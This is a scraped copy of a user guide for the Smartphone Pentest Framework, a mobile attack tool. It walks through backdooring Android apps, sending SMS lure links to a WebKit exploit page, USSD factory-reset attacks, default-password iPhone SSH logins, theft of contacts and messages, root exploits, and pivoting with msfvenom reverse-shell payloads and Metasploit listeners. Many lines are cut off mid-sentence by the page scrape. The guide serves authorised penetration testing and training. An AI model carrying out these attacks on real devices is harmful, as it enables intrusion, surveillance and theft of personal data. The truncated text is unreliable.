Scribd
Upload
303 views27 pages

SPF User Guide - Bulb Security For Dummies

Uploaded by

sadjoker1
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
303 views27 pages

SPF User Guide - Bulb Security For Dummies

Uploaded by

sadjoker1
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 27

SPF User Guide – Bulb Security http://www.bulbsecurity.com/products/smartphone-pentest-framework/spf...

Bulb Security: Penetration Testing, Security Research, Training Search

SPF User Guide


Home Products Smartphone Pentest Framework SPF User Guide

CONTACT US
TODAY

CONTENT NAVIGATION

Installation

SPF is supported on Ubuntu Linux and the Kali Linux penetration


testing distribution. Support for other platforms is in development.

SPF is hosted on githib.com and can be downloaded with git clone


https://github.com/georgiaw/Smartphone-Pentest-Framework.git.

Kali:
Many of the prerequisites for SPF are already installed on Kali Linux Submit
including MySQL, Apache2, and the Android SDK. After cloning the
git repository for SPF change directories to the newly created
Smartphone-Pentest-Framework directory and run the kaliinstall
script as shown below.

TESTIMONIALS

1 of 27 6/14/2016 10:05 AM
SPF User Guide – Bulb Security http://www.bulbsecurity.com/products/smartphone-pentest-framework/spf...

root@kali:~# git clone https://github.com/georgiaw “Trainer Georgia was very sk


HOME SERVICES PRODUCTS PUBLIC SPEAKING
/Smartphone-Pentest-Framework.git knows what she preaches!”

root@kali:~# cd Smartphone-Pentest-Framework
MEDIA ACTIVITY ABOUT CONTACT
root@kali:~/Smartphone-Pentest-Framework# Student, Traini
Veenendaal, Ne
./kaliinstall

The kaliinstall script will install any necessary Android components, set
up the empty Mysql database, and start the web server.

Ubuntu:
The installation process is similar for Ubuntu Linux. Clone the git
repository for SPF and change directories to the Smartphone-Pentest-
Framework directory that is created by git. Run the ubuntuinstall script.
This will install the prerequisites such as the Android SDK, Mysql, and
Apache2 if they are not already installed. It will also setup an empty
database and start the web server.

georgia@ubuntu:~# git clone https://github.com


/georgiaw/Smartphone-Pentest-Framework.git
georgia@ubuntu:~# cd Smartphone-Pentest-Framework
georgia@ubuntu:~/Smartphone-Pentest-Framework#
./ubuntuinstall

Setting Up

The install scripts for your platform will automatically start the database
and webserver for use with SPF.  On subsequent uses you will need to
start your database and webserver manually before starting SPF. On both
Kali and Ubuntu use service <service to start> start to start the database
and webserver. SPF currently supports Apache2 as the webserver.

root@kali:~/Smartphone-Pentest-Framework
/frameworkconsole# service apache2 start

Mysql and Postgresql are supported databases for SPF.

root@kali:~/Smartphone-Pentest-Framework

2 of 27 6/14/2016 10:05 AM
SPF User Guide – Bulb Security http://www.bulbsecurity.com/products/smartphone-pentest-framework/spf...

/frameworkconsole# service mysql start


HOME SERVICES PRODUCTS PUBLIC SPEAKING
Finally, you need to edit the SPF con guration le to match your environment.
The SPF con guration
MEDIAle isACTIVITY
located in the frameworkconsole
ABOUT directory and is
CONTACT
called con g. The default con guration le is set up to match a Kali Linux
install from the root directory. You will need to change any options to meet
your environment if it is di erent.

root@kali:~/Smartphone-Pentest-Framework
/frameworkconsole# cat config

#SMARTPHONE PENTEST FRAMEWORK CONFIG FILE

#ROOT DIRECTORY FOR THE WEBSERVER THAT WILL HOST OUR


FILES

WEBSERVER = /var/www

#IPADDRESS FOR WEBSERVER (webserver needs to be listening


on this address)

IPADDRESS = 192.168.20.9

#IP ADDRESS TO LISTEN ON FOR SHELLS

SHELLIPADDRESS = 192.168.20.9

#IP ADDRESS OF SQLSERVER 127.0.0.1 IF LOCALHOST

MYSQLSERVER = 127.0.0.1

..snip…

The IPADDRESS option should be set to the IP address of your webserver. The
SHELLIPADDRESS option should be set to the IP address where listeners
should listen for incoming shells.

Other options in the con guration le include paths to software and database
login information.

Running SPF

Now you are ready to run the SPF server. Start SPF from the
frameworkconsole directory. Run framework.py and you should be presented

3 of 27 6/14/2016 10:05 AM
SPF User Guide – Bulb Security http://www.bulbsecurity.com/products/smartphone-pentest-framework/spf...

with the SPF menu as shown below.


HOME SERVICES PRODUCTS PUBLIC SPEAKING
root@kali:~/Smartphone-Pentest-Framework/frameworkconsole#
./framework.pyMEDIA ACTIVITY ABOUT CONTACT

Welcome to the Smartphone Pentest Framework!

v0.2.5

Georgia Weidman/Bulb Security

Select An Option from the Menu:

1.) Attach Framework to a Deployed Agent/Create Agent

2.) Send Commands to an Agent

3.) View Information Gathered

4.) Attach Framework to a Mobile Modem

5.) Run a remote attack

6.) Run a social engineering or client side attack

7.) Clear/Create Database

8.) Use Metasploit

9.) Compile code to run on mobile devices

10.) Install Stuff

0.) Exit

spf>

SPF stores information about Agents, attacks, etc. in the database. To clear out any
data from the database or set it up for the rst time choose option 7.) Clear/Create
Database from the main menu. You will be prompted to make sure you want to
destroy all your logs. Type y.

spf> 7
This will destroy all your data. Are you sure you want to?
(y/N)?y

4 of 27 6/14/2016 10:05 AM
SPF User Guide – Bulb Security http://www.bulbsecurity.com/products/smartphone-pentest-framework/spf...

If this is successful you know you SPF can successfully communicate with the database.
HOME SERVICES PRODUCTS PUBLIC SPEAKING
If an error is thrown check that the database server is running and the options in the
con g le are correct.
MEDIA ACTIVITY ABOUT CONTACT

Attaching a Mobile Modem

SPF allows you to run attacks from a mobile device using SMS, NFC, etc.  Rather than
using a paid service, you can attach SPF to a mobile device you already own including
an Android phone/tablet or USB modem.

SPF App
One option for the mobile modem is installing the SPF App on your Android phone. It
will allow you to control and interact with the SPF console and SPF Agents (discussed
later in this manual).  The SPF App interacts with the SPF console via HTTP. The SPF App
can interact with SPF Agents via SMS as well as send SMS and NFC based attacks to
other devices.

Building the SPF App


A limitation of the open source SPF is that the App can only control one SPF Agents. The
phone number, HTTP check in URL, and 7 character control key will be hardcoded into
the App based on your input. Also the IP address of the SPF console will be
automatically hardcoded into the App from the con guration le.

Choose option 4 at the main menu. Then choose 3.) Generate smartphone based app.
You will have the option to build the SPF App for Android without NFC or the SPF App
for Android with NFC. The NFC. The App with NFC requires Android 4.0 or later and a
NFC enabled device. The App without NFC requires Android 1.6 or later (i.e. any device
even G1).

You will be prompted for information about the Agent that will be controlled by this App.
 Enter the phone number,  HTTP check in URL,  and 7 digit control key. These will be the
same as the Agent we will discuss later in this manual.

spf> 4
Choose a type of modem to attach to:

1.) Search for attached modem

2.) Attach to a smartphone based app

5 of 27 6/14/2016 10:05 AM
SPF User Guide – Bulb Security http://www.bulbsecurity.com/products/smartphone-pentest-framework/spf...

3.) Generate smartphone based app


HOME SERVICES PRODUCTS PUBLIC SPEAKING
4.) Copy App to Webserver

MEDIA ACTIVITY ABOUT CONTACT


5.) Install App via ADB

spf> 3

Choose a type of control app to generate:

1.) Android App (Android 1.6)

2.) Android App with NFC (Android 4.0 and NFC enabled device)

spf> 1v

Phone number of agent: 15555215556

Control key for the agent: KEYKEY1

Webserver control path for agent: /androidagent1

Control Number:15555215556

Control Key:KEYKEY1

Control Path:/bookspf

Is this correct?(y/n)y

...snip...

-post-build:

debug:

BUILD SUCCESSFUL

Total time: 10 seconds

SPF using the Android SDK automatically generates the App.

Deploying the App


To deploy the App on your device, you have 2 options. You can install the App using the
Android Debug Bridge (ADB)  and attaching your device with ADB enabled to the same
machine as the SPF console. Choose option 4 at the main menu. Then choose option 5.)
Install App via ADB. The ADB daemon will search for attached devices. Enter the name of the
attached device you want to install the App onu. Then choose the App (with NFC or without)

6 of 27 6/14/2016 10:05 AM
SPF User Guide – Bulb Security http://www.bulbsecurity.com/products/smartphone-pentest-framework/spf...

you want to install.


HOME SERVICES PRODUCTS PUBLIC SPEAKING
Choose a type of modem to attach to:

MEDIA ACTIVITY
1.) Search for attached modem
ABOUT CONTACT

2.) Attach to a smartphone based app

3.) Generate smartphone based app

4.) Copy App to Webserver

5.) Install App via ADB

spf> 5

* daemon not running. starting it now on port 5037 *

* daemon started successfully *

List of devices attached

emulator-5554 device

emulator-5556 device

emulator-5558 device

Choose a device to install on: emulator-5554u

Which App?

1.)Framework Android App with NFC

2.)Framework Android App without NFC

spf> 2

1463 KB/s (46775 bytes in 0.031s)

pkg: /data/local/tmp/FrameworkAndroidApp.apk

Success

Alternatively, SPF will upload the App to the web server in the con g le. Choose option 4 at the
main menu and then option 4.) Copy App to Webserver. Choose which App to upload (with NFC or
without). Then specify the path and lename on the web server where you would like to upload the
App.

7 of 27 6/14/2016 10:05 AM
SPF User Guide – Bulb Security http://www.bulbsecurity.com/products/smartphone-pentest-framework/spf...

Choose a type of modem to attach to:


HOME SERVICES PRODUCTS PUBLIC SPEAKING
1.) Search for attached modem

MEDIA ACTIVITY ABOUT CONTACT


Using the browser on your Android device, browse to the link and download and install the App.

2.) Attach to a smartphone based app

3.) Generate smartphone based app

4.) Copy App to Webserver

5.) Install App via ADB

spf> 4

Which App?

1.)Framework Android App with NFC

2.)Framework Android App without NFC

spf> 2

Hosting Path: /bookspf2

Filename: /app.apk

Using the browser on your Android device, browse to the link and download and install the App.

Attaching the App to SPF


Once the App is deployed on your Android device, attach it to the SPF console by choosing option 4 at
the main menu and then 2.) Attach a smartphone based app. Enter the phone number, 7 character
control key (this does not need to be the same value as the Agent key we used earlier), and the URL
path where the App will check in for commands and upload data to the SPF console.

Choose a type of modem to attach to:

1.) Search for attached modem

2.) Attach to a smartphone based app

3.) Generate smartphone based app

4.) Copy App to Webserver

5.) Install App via ADB

spf> 2

8 of 27 6/14/2016 10:05 AM
SPF User Guide – Bulb Security http://www.bulbsecurity.com/products/smartphone-pentest-framework/spf...

Connect to a smartphone management app. You will need to supply the phone
HOME SERVICES PRODUCTS PUBLIC SPEAKING
number, the control key, and the URL path

Phone Number: MEDIA ACTIVITY


15555215554 ABOUT CONTACT

Control Key: KEYKEY1

App URL Path: /bookapp

Phone Number: 15555215554

Control Key: KEYKEY1

URL Path: /bookapp

Is this correct?(y/N): y

The SPF console will appear to hang as it waits for the App to check in.

Open the App on the Android device. As shown in the Figure below ll in the IP address of the SPF console
as well as the same values for the control key and URL path as you entered in the SPF console.

The App and the console will perform a handshake with each other. The App will open a command menu
and the console will return to the main menu. Now the device is attached and may be used for mobile
modem functionality with SPF.

USB Modem
Another option for sending mobile modem based attacks and commands is to attach a USB modem with a
SIM card to the machine with the SPF console.  Currently the only supported USB modem is a Zoom 4595.
Attach the modem to the SPF console machine. Choose option 4 at the main menu followed by option 1.)
Search for attached modem. If a USB modem is present at the correct serial port SPF will attempt to send
commands to it. If it is successful the device will be added to the database as a mobile modem. If you use
the USB device to send commands to Agents or run mobile modem based attacks SPF will use AT
commands to interact with the USB modem.

spf> 4

Choose a type of modem to attach to:

1.) Search for attached modem

2.) Attach to a smartphone based app

3.) Generate smartphone based app

4.) Copy App to Webserver

9 of 27 6/14/2016 10:05 AM
SPF User Guide – Bulb Security http://www.bulbsecurity.com/products/smartphone-pentest-framework/spf...

5.) Install App via ADB


HOME SERVICES PRODUCTS PUBLIC SPEAKING
spf> 1

MEDIA ACTIVITY ABOUT CONTACT


USB Modem Found

ATZ

OK

Remote Attack Examples

SPF can be used to stage remote attacks on mobile devices where such vulnerabilities exist.

iPhone Default SSH Password


A very simple, somewhat dated, but still sometimes e ective attack is testing for a default root password on a
jailbroken iPhone with SSH enabled.  This is one of the few mobile centric attacks in the Metasploit Framework.
Thus SPF will interface with Metasploit to run the attack. Choose option 8 from the main menu.  Choose 1.) Run
iPhone Metasploit Modules. Then choose option 1.) Cydia Default SSH Password. This attack is network based, so
you are prompted for the IP address of the iPhone.

spf> 8

Runs smartphone centric Metasploit modules for you.

Select An Option from the Menu:

1.) Run iPhone Metasploit Modules

2.) Create Android Meterpreter

3.) Setup Metasploit Listener

spf> 1

Select An Exploit:

1.) Cydia Default SSH Password

2.) Email LibTiff iOS 1

3.) MobileSafari LibTiff iOS 1

spf> 1

Logs in with alpine on a jailbroken iPhone with SSH enabled.

10 of 27 6/14/2016 10:05 AM
SPF User Guide – Bulb Security http://www.bulbsecurity.com/products/smartphone-pentest-framework/spf...

iPhone IP address: 192.168.20.13


HOME SERVICES PRODUCTS PUBLIC SPEAKING
[*] Initializing modules...

MEDIA ACTIVITY ABOUT CONTACT


RHOST => 192.168.20.13

[*] 192.168.20.13:22 - Attempt to login as 'root' with password 'alpine'

[*] 192.168.20.13:22 - Attempt to login as 'mobile' with password 'dottie'

SPF will call Metasploit (verify the Metasploit path in the con guration le) and run the relevant module. If the iPho
vulnerable, you will be presented with a root command shell on the iPhone.

Client Side Attack Examples

More common on modern computing platforms, mobile devices included, are client side attacks.

Client Side Browser Shell:


Mobile browsers are a likely target to gain command execution through a client side attack. For example from the m
menu choose option 6 then choose option 2.) Client Side Shell. You will be presented with the available execution
hijacking attacks for mobile. For example choose option 1) CVE=2010-1759 Webkit Vuln Android to create a malicio
webpage that exploits a vulnerability in the webkit package on Android.

You will be prompted for the URL path and page name for the malicious page as well as the delivery method to en
a mobile user to open the malicious page. Client side attacks can be delivered via SMS or NFC. To send the attack
SMS you will need to specify the recipient phone number. The SPF console will appear to hang as it is waiting for t
incoming shell. The listener will time out and return to the main menu if a shell does not arrive.

spf> 6

Choose a social engineering or client side attack to launch:

1.) Direct Download Agent

2.) Client Side Shell

3.) USSD Webpage Attack (Safe)

4 ) USSD Webpage Attack (Malicious)

spf> 2

Select a Client Side Attack to Run

1) CVE=2010-1759 Webkit Vuln Android

11 of 27 6/14/2016 10:05 AM
SPF User Guide – Bulb Security http://www.bulbsecurity.com/products/smartphone-pentest-framework/spf...

spf> 1
HOME SERVICES PRODUCTS PUBLIC SPEAKING
Hosting Path: /spfbook2

MEDIA ACTIVITY ABOUT CONTACT


Filename: /book.html

Delivery Method(SMS or NFC): SMS

Phone Number to Attack: 15555215558

Custom text(y/N)? N

You can use custom text for the message or the default “This is a cool page: ” message.

15555215554:This is a cool page: http://192.168.20.9/spfbook2/book.html

If the user clicks on the link and the browser is vulnerable to the attack a shell will be thrown back to the IP address
in the con guration le for SHELLIPADDRESS. The id command will be automatically run when the shell connects
then run commands that Android knows. Type exit when you are done with the shell.

Connected: Try exit to quit

uid=10002(app_2) gid=10002(app_2) groups=1015(sdcard_rw),3003(inet)

/system/bin/ls

sqlite_stmt_journals

..snip..

exit

USSD Remote Control


Not all client side attacks involve hijacking execution.  One such attack an Android bug from 2013 where numbers
webpages were automatically opened in the dialer including USSD codes that could potentially harm the device. A
choose option 6 at the main menu. Two USSD attacks are implemented in SPF at this time to test for this issue. 3.) U
Webpage Attack (Safe) will instruct the vulnerable device to present a pop up with its IMEI as shown in the Figure b
USSED Webpage Attack (Malicious) will attempt to factory restore the device and should obviously not be used w
client permission. You will be prompted for a URL path, page, and phone number to attack.

spf> 6

Choose a social engineering or client side attack to launch:

1.) Direct Download Agent

2.) Client Side Shell

12 of 27 6/14/2016 10:05 AM
SPF User Guide – Bulb Security http://www.bulbsecurity.com/products/smartphone-pentest-framework/spf...

3.) USSD Webpage Attack (Safe)


HOME SERVICES PRODUCTS PUBLIC SPEAKING
4 ) USSD Webpage Attack (Malicious)

MEDIA ACTIVITY ABOUT CONTACT


spf> 3

Hosting Path: /spfbook2

Filename: /book2.html

Phone Number to Attack: 15555215558

SPF Agents

Another way of attacking mobile devices is enticing users to install a malicious application. SPF uses Agents inside
apps. SPF Agents include a variety of functionality including payloads for remote control, information gathering, at
installed apps, and even attacking other devices.

Building SPF Agents: Backdooring Source Code


To get the SPF Agent inside of a legitimate application we have 2 options. We can backdoor Android App source c
backdoor a compiled APK. To backdoor source code with the SPF Agent choose option 1 at the main menu follow
Generate Agent App. You will be presented with all the source code templates imported into SPF.  You can import
templates by choosing option 1 at the main menu and then 4.) Import an Agent Template.

You will be prompted for the phone number of the mobile modem that can control this Agent, the check in URL pa
character key. These values should be the same as the values you entered when creating the corresponding app if

spf> 1

Select An Option from the Menu:

1.) Attach Framework to a Deployed Agent

2.) Generate Agent App

3.) Copy Agent to Web Server

4.) Import an Agent Template

5.) Backdoor Android APK with Agent

6.) Create APK Signing Key

spf> 2

13 of 27 6/14/2016 10:05 AM
SPF User Guide – Bulb Security http://www.bulbsecurity.com/products/smartphone-pentest-framework/spf...

1.) MapsDemo
HOME SERVICES PRODUCTS PUBLIC SPEAKING
2.) BlankFrontEnd

MEDIA ACTIVITY ABOUT CONTACT


spf> 1

Phone number of the control modem for the agent: 15555215554

Control key for the agent: KEYKEY1

Webserver control path for agent: /androidagent1

Control Number:15555215554

Control Key:KEYKEY1

Control Path:/androidagent1

Is this correct?(y/n) y

..snip..

BUILD SUCCESSFUL

The Android Agent will be automatically built using the source code template speci ed using the Android SDK.

Building SPF Agents: Backdooring APKs


If the source code of the app you want to backdoor with the SPF Agent is not available, SPF can also backdoor com
that this process uses the 3rd party apktool program.

To backdoor an APK choose option 1 from the main menu followed by 5.) Backdoor APK with Agent. You will be pr
to backdoor. If apktool is not found SPF will ask you if you want to download it before continuing.

spf> 1

Select An Option from the Menu:

1.) Attach Framework to a Deployed Agent

2.) Generate Agent App

3.) Copy Agent to Web Server

4.) Import an Agent Template

5.) Backdoor Android APK with Agent

6.) Create APK Signing Key

14 of 27 6/14/2016 10:05 AM
SPF User Guide – Bulb Security http://www.bulbsecurity.com/products/smartphone-pentest-framework/spf...

spf> 5
HOME SERVICES PRODUCTS PUBLIC SPEAKING
APKTool not found! Is it installed? Check your config file

MEDIA ACTIVITY ABOUT CONTACT


Install Android APKTool(y/N)?

spf> y

--2013-12-04 12:28:21-- https://android-apktool.googlecode.com/files/apktool-install


r05-ibot.tar.bz2

..snip..

Puts the Android Agent inside an Android App APK. The application runs normally with
functionality

APK to Backdoor: /root/Desktop/MapsDemo.apk

I: Baksmaling...

..snip..

You will be prompted for the same information for control as backdooring source code.

Phone number of the control modem for the agent: 15555215554

Control key for the agent: KEYKEY1

Webserver control path for agent: /androidagent1

Control Number: 15555215554

Control Key:KEYKEY1

ControlPath:/androidagent1

Is this correct?(y/n) y

..snip..

The APK will be rebuilt with the SPF Agent included.

Signing the APK: Android Masterkey Vulnerability


In order to install an APK on a device it must be signed. The open source SPF does not currently support signing an
Play or other app stores though this process can be completed manually. You can instead use the debug key for A
Master Key Vulnerability from 2013. This vulnerability is present on Android devices before Android 4.3.  Using the M
original signatures and original application les will be added to the generated backdoored APK. This will allow ou

15 of 27 6/14/2016 10:05 AM
SPF User Guide – Bulb Security http://www.bulbsecurity.com/products/smartphone-pentest-framework/spf...

appear to be a legitimate update for an already installed app.


HOME SERVICES PRODUCTS PUBLIC SPEAKING
Use Android Master Key Vuln?(y/N): y

MEDIA ACTIVITY
Archive: /root/Desktop/abcnews.apk
ABOUT CONTACT

..snip..

Inflating: unzipped/META-INF/CERT.RSA

Signing the APK: Debug Key


Alternatively you can sign the APK with the debug Android SDK key.

Use Android Master Key Vuln?(y/N): n

Password for Debug Keystore is android

Enter Passphrase for keystore:

..snip..

signing: resources.arsc

Deploying the Agent


Of course in order for the SPF Agent to be useful, it must be downloaded to a user’s device. SPF can automate the
NFC request to download the Agent app. Choose option 6 at the main menu. Choose 1.) Direct Download Agent. In
added to Metasploit. You can generate Android Meterpreter in the 8.) Use Metasploit menu. To tell SPF to deploy th
Meterpreter type Agent at the prompt. You are then prompted for the URL path and lename, attack vector (SMS o
number to attack and whether you would like to change the default text.

spf> 6

Choose a social engineering or client side attack to launch:

1.) Direct Download Agent

2.) Client Side Shell

3.) USSD Webpage Attack (Safe)

4 ) USSD Webpage Attack (Malicious)

spf> 1

This module sends an SMS with a link to directly download and install an Agent

Deliver Android Agent or Android Meterpreter (Agent/meterpreter:) Agent

16 of 27 6/14/2016 10:05 AM
SPF User Guide – Bulb Security http://www.bulbsecurity.com/products/smartphone-pentest-framework/spf...

Hosting Path: /spfbook3


HOME SERVICES PRODUCTS PUBLIC SPEAKING
Filename: /maps.apk

MEDIA ACTIVITY ABOUT CONTACT


Delivery Method:(SMS or NFC): SMS

Phone Number to Attack: 15555215556

Custom text(y/N)? N

If the user installs the Agent it will look and feel like the original app, but will have additional functionality.

Attaching to the Agent: HTTP


Now to attach to the Agent with the SPF console. Agents can communicate over SMS and HTTP. To attach to the A
either HTTP or SMS as requested and if the Agent responds it will be considered active and added to the SPF data
option 1 at the main menu and then 1.) Attach Framework to a Deployed Agent. You will be prompted for the metho
character control key. Choose HTTP and you will be prompted for the check in URL as well. Enter this information
checkin process will take around 60 seconds.

spf> 1

Select An Option from the Menu:

1.) Attach Framework to a Deployed Agent

2.) Generate Agent App

3.) Copy Agent to Web Server

4.) Import an Agent Template

5.) Backdoor Android APK with Agent

6.) Create APK Signing Key

spf> 1

Attach to a Deployed Agent:

This will set up handlers to control an agent that has already been deployed.

Agent Control Key: KEYKEY1

Communication Method(SMS/HTTP): HTTP

Agent URL Path: /androidagent1

URL Path: /androidagent1

17 of 27 6/14/2016 10:05 AM
SPF User Guide – Bulb Security http://www.bulbsecurity.com/products/smartphone-pentest-framework/spf...

Control Key: KEYKEY1


HOME SERVICES PRODUCTS PUBLIC SPEAKING
Communication Method(SMS/HTTP): HTTP

MEDIA ACTIVITY ABOUT CONTACT


Is this correct?(y/N): y

After the check in is completed, from the main menu choose option 2. The Available Agents list should show the p

spf> 2

Available Agents:

1.) 15555215556

Attaching to the Agent: SMS


The process for having the Agent check in over SMS is similar. Instead of the URL path you will be prompted for th
be attached to SPF for this to work, and it must have the phone number the SPF Agent is programmed to respond

Agent Post Exploitation: Information Gathering Example


Once an Agent is deployed and connected to SPF you have di erent command options. For example you can gath
option 2 at the main menu then choose the id of the Agent you want to interact with from the list. Choose option 14
of the installed apps on the device with the Agent to the SPF database. You will be prompted for the delivery and r
Agent commands.

spf> 2

View Data Gathered from a Deployed Agent:

Available Agents:

1.) 15555215556

Select an agent to interact with or 0 to return to the previous menu.

spf> 1

Commands:

1.) Send SMS

2.) Take Picture

3.) Get Contacts

4.) Get SMS Database

5.) Privilege Escalation

18 of 27 6/14/2016 10:05 AM
SPF User Guide – Bulb Security http://www.bulbsecurity.com/products/smartphone-pentest-framework/spf...

6.) Download File


HOME SERVICES PRODUCTS PUBLIC SPEAKING
7.) Execute Command

MEDIA ACTIVITY ABOUT CONTACT


8.) Upload File

9.) Ping Sweep

10.) TCP Listener

11.) Connect to Listener

12.) Run Nmap

13.) Execute Command and Upload Results

14.) Get Installed Apps List

15.) Remove Locks (Android < 4.4)

Select a command to perform or 0 to return to the previous menu

spf> 14

Gets a list of installed packages(apps) and uploads to a file.

Delivery Method(SMS or HTTP): HTTP

Give SPF about a minute to nish the command (some commands such as running Nmap as discussed below will
choose option 3. At the prompt type Agents to see details about an Agent (SPF also stores information about attac
The Packages eld should be lled in with the results of the command.

spf> 3

View Data Gathered from a Deployed Agent:

Agents or Attacks?Agents

Available Agents:

1.) 15555215556

Select an agent to interact with or 0 to return to the previous menu.

spf> 1

Data:

SMS Database:

19 of 27 6/14/2016 10:05 AM
SPF User Guide – Bulb Security http://www.bulbsecurity.com/products/smartphone-pentest-framework/spf...

Contacts:
HOME SERVICES PRODUCTS PUBLIC SPEAKING
Picture Location:

MEDIA ACTIVITY ABOUT CONTACT


Rooted:

Ping Sweep:

File:

Packages: package:com.google.android.locationv

..snip..

package:com.android.providers.downloads

package:com.android.server.vpn

Agent Post Exploitation: Remote Control Example


There are also payloads to remotely control the device. For example from the Agent control menu choose 1.) Send
another device in the background. You will be prompted for the phone number and message. Combined with the G
additional users into downloading and installing Agents.

Commands:

..snip..

Select a command to perform or 0 to return to the previous menu

spf> 1

Send an SMS message to another phone. Fill in the number, the message to send, and t

Number: 15555215558

Message: hiya Georgia

Delivery Method(SMS or HTTP) SMS

Agent Post Exploitation: Privilege Escalation


The Agent is stuck inside the Android sandbox. Though the permission model allows us a lot of leeway anyway, yo
download and run known privilege escalation exploits against the device and create a hidden root shell if success
choose based on the Android version of the device.

Commands:

..snip..

20 of 27 6/14/2016 10:05 AM
SPF User Guide – Bulb Security http://www.bulbsecurity.com/products/smartphone-pentest-framework/spf...

Select a command to perform or 0 to return to the previous menu


HOME SERVICES PRODUCTS PUBLIC SPEAKING
spf> 5

MEDIA ACTIVITY ABOUT CONTACT


1.) Choose a Root Exploit

2.) Let SPF AutoSelect

Select an option or 0 to return to the previous menu

spf> 2

Try a privilege escalation exploit.

Chosen Exploit: rageagainstthecage

Delivery Method (SMS or HTTP): HTTP

If the rooting is successful it will be recorded in the database.

Rooted: RageAgainstTheCage

Agent Post Exploitation: Pivoting through Mobile Devices


Mobile devices often attach to home, o ce, and public Wi networks. The SPF Agent can be used to learn more ab

Portscanning with Nmap


SPF Agents have the ability to download les, run shell commands, and upload results. There is a special comman
shot.  First we need to download the 3rd party tool Nmap for Android. Choose option 10.) Install Stu at the main m
download the tool from the Nmap repositories to be dropped onto the Agent infected device.

spf> 10

What would you like to Install?

1.) Android SDKS

2.) Android APKTool

3.) Download Android Nmap

spf> 3

Download Nmap for Android(y/N)?

spf> y

At the Agents command menu choose option 12.) Run Nmap. You will be prompted for the Nmap target. Any targe

21 of 27 6/14/2016 10:05 AM
SPF User Guide – Bulb Security http://www.bulbsecurity.com/products/smartphone-pentest-framework/spf...

Select a command to perform or 0 to return to the previous menu


HOME SERVICES PRODUCTS PUBLIC SPEAKING
spf> 12

MEDIA ACTIVITY ABOUT CONTACT


Download Nmap and port scan a host of range. Use any accepted format for target spec

Nmap Target: 192.168.20.10

Delivery Method(SMS or HTTP) HTTP

This command can take up to 5 minutes to return its information to the database. The data is in the File eld.

# Nmap 5.61TEST4 scan initiated Sun Sep 1 23:41:30 2014 as: /data/data/com.example.an
/com.example.android.google.apis/files/nmapoutput 192.168.20.10

Nmap scan report for 192.168.20.10

Host is up (0.0068s latency).

Not shown: 992 closed ports

PORT STATE SERVICE

21/tcp open ftp

..snip..

# Nmap done at Sun Sep 1 23:41:33 2014 -- 1 IP address (1 host up) scanned in 3.43 s

Exploiting a System through a Pivot Example


If a device on the local network is subject to a remote vulnerability, we can not directly exploit it from the Internet,
it can directly attempt to exploit the vulnerability. For example, consider a commonly used exploit development e
network while preparing for a class. A simple C exploit for this is issue is included with SPF in Smartphone-Pentest
the payload to meet your needs. Msfvenom from Metasploit is an ideal to for this. For this example we will set up a
exploited device call back with a reverse shell. Later in this document we will look at having the shell sent through
of egress ltering is in the way.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.20.9 -f c -b '\x00\x0a\x0d

The C code needs to be compiled to run on an Android device. The Android cross compiler is included as part of S
option 1.) Compile C code for ARM Android. Give it the C le to compile and the output location.

spf> 9

Compile code to run on mobile devices

1.) Compile C code for ARM Android

22 of 27 6/14/2016 10:05 AM
SPF User Guide – Bulb Security http://www.bulbsecurity.com/products/smartphone-pentest-framework/spf...

spf> 1
HOME SERVICES PRODUCTS PUBLIC SPEAKING
Compiles C code to run on ARM based Android devices. Supply the C code file and the

MEDIA ACTIVITY ABOUT CONTACT


File to Compile: /root/Smartphone-Pentest-Framework/exploits/Windows/warftpmeterpret

Output File: /root/Smartphone-Pentest-Framework/exploits/Windows/warftpmeterpreter

Now for the Agents menu choose option 6.) Download File.

Select a command to perform or 0 to return to the previous menu

spf> 6

Downloads a file to the phone. Fill in the file and the delivery method(SMS or HTTP)

File to download: /root/Smartphone-Pentest-Framework/exploits/Windows/warftpmeterpre

Delivery Method(SMS or HTTP): HTTP

Before we run the exploit we need to set up a listener to catch the payload. For my example I used a Metasploit W
machine. I will set up the corresponding listener with Metasploit.

msf > use multi/handler

msf exploit(handler) > set payload windows/meterpreter/reverse_tcp

payload => windows/meterpreter/reverse_tcp

msf exploit(handler) > set LHOST 192.168.20.9

LHOST => 192.168.20.9

msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.20.9:4444

[*] Starting the payload handler...

Now from the SPF Agents menu choose 7.) Run Command. Run the downloaded exploit. In my case I need to give
phone. If it successfully exploits the victim the payload I created will be run.

Select a command to perform or 0 to return to the previous menu

spf> 7

Run a command in the terminal. Fill in the command and the delivery method(SMS or HT

Command: warftpmeterpreter 192.168.20.10 21

23 of 27 6/14/2016 10:05 AM
SPF User Guide – Bulb Security http://www.bulbsecurity.com/products/smartphone-pentest-framework/spf...

Downloaded?: yes
HOME SERVICES PRODUCTS PUBLIC SPEAKING
Delivery Method(SMS or HTTP): HTTP

MEDIA ACTIVITY ABOUT CONTACT


And I will be a shell in Metasploit.

meterpreter >

Exploiting a System through a Pivot with SMS Shell Example


Even more interesting is using the Agent infected mobile device as a pivot point for the shell from the exploited m
at the perimeter of the local network by using SMS to send the shell out.

There is another example C exploit for WarFTP 1.65 in Smartphone-Pentest-Framework/exploits/Windows for a in


address of the Agent infected device.

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.20.37 -b '\x00\x0a\x0d\x40' -f c

Compile the code with SPF with option 9 at the main menu.

spf> 9

Compile code to run on mobile devices

1.) Compile C code for ARM Android

spf> 1

Compiles C code to run on ARM based Android devices. Supply the C code file and the

File to Compile: /root/Smartphone-Pentest-Framework/exploits/Windows/warftpreversesh

Output File: /root/Smartphone-Pentest-Framework/exploits/Windows/warftp2

Download the compiled file to the Agent infected device with option 6 in the Agent C

